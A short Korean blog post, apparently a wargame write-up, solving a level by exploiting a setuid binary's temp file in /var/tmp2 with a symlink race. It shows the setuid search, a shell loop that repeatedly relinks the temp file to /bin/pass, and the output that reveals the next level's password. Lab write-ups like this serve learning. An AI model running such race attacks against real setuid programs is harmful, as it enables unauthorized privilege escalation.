이번부터는 해킹기법에 대한 이해가 필요하다. 한때 유명했던 8lgm 이 즐겨 발표했던 방법으로써 /usr/bin/ps2 를 이용하여 다음 레벨을 획득하여라. 힌트를 주자면 임시파일이 /var/tmp2 에 생성된다.
——-
[level8@drill /]$ find / -perm +4000 -user level9 -ls 2> /dev/null
672308 16 -rws–x— 1 level9 level8 15739 Jul 5 2001 /usr/bin/ps2
[level8@drill /]$ /usr/bin/ps2
[level8@drill /]$ find /var/tmp2 -user level9
ps2는 쓰고 바로 지우는군요.
[level8@drill tmp2]$ cat race
while true
do
/usr/bin/ps2 &
rm -f /var/tmp2/ps2.tmp
ln -sf /bin/pass /var/tmp2/ps2.tmp
done
[level8@drill tmp2]$ ./race
file is symbolic link
file is symbolic link
file is symbolic link
file is symbolic link
file is symbolic link
file is symbolic link
file is symbolic link
ln: cannot remove `/var/tmp2/ps2.tmp’: Operation not permitted
file exist
file is symbolic link
rm: cannot unlink `/var/tmp2/ps2.tmp’: Operation not permitted
Congratulations !!! your race attack success ~
level9 Password is !secu!
솔직히 문제 자체가 좀 말이 안되는감이 있음…
Leave a Reply